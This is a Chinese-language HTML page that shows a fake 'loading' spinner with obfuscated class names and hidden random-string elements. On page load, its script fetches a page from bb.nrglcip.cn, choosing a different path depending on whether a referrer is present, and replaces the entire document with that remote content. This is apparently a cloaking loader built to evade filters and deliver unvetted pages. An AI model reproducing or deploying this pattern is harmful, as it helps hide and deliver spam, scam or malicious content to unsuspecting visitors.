<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .GuB6aC9sct {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .GuB6aC9sct .Gz9n2slm49 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .GuB6aC9sct .content {
            line-height: 50px;
            text-align: center
        }

        .GuB6aC9sct .img {
            width: 100%
        }

        .GuB6aC9sct .zuxcYjBSOzx {
            text-align: center
        }

        .GuB6aC9sct .zuxcYjBSOzx span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .GuB6aC9sct .zuxcYjBSOzx span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .GuB6aC9sct .zuxcYjBSOzx span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .GuB6aC9sct .zuxcYjBSOzx span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .GuB6aC9sct .zuxcYjBSOzx span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .GuB6aC9sct .zuxcYjBSOzx span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .GuB6aC9sct .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CdSPcesQu(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gokkIC = CdSPcesQu('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gokkIC +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gokkIC +".html?a=share";
		}
		
        JqPmXN=url+"#"+new Date().getTime();
        JqPmXN && function() {
            $.get(JqPmXN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>Xht9kLS6ZbtZtRtqQFEpsMBbPAk5a7RXfhdDMgRhgRMEKsGBJY8jkR2bUKFCuomvzCol7siYLg</p>
<div style='display:none'>bkxONZJsU0BsBaszjcDfY</div>
<h1 style='display:none' >gKTHuNu5MlVDO92IsoZDGT2imV5mTtFuPKmS1DqrzEVKtxMmCRE1fNN9RTnkNWpfTNWZ6Gmr4K2zt8jQPkg730YadD</h1><div class="GuB6aC9sct">
    <div class="Gz9n2slm49">
        <div class="zuxcYjBSOzx">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >WxILwQ7gQmmSuwJsa2oLYHJtsbBJqbXzuuz2Y2</h1>
<b style='display:none' >qhpPQfGWH5uML6EGuJH2HFoBlzc6MtyfTpZYMZtgvSzk5HF7q1INre2ET</b>
<b style='display:none' >qhpPQfGWH5uML6EGuJH2HFoBlzc6MtyfTpZYMZtgvSzk5HF7q1INre2ET</b>
<li style='display:none' >gYscHeph7Ui31xpuxylTThVHOdIS1eejS5DTxQDPLzKHqtkNruEzjYjOMaguaJ36V</li>
<b style='display:none' >qhpPQfGWH5uML6EGuJH2HFoBlzc6MtyfTpZYMZtgvSzk5HF7q1INre2ET</b></body>
</html>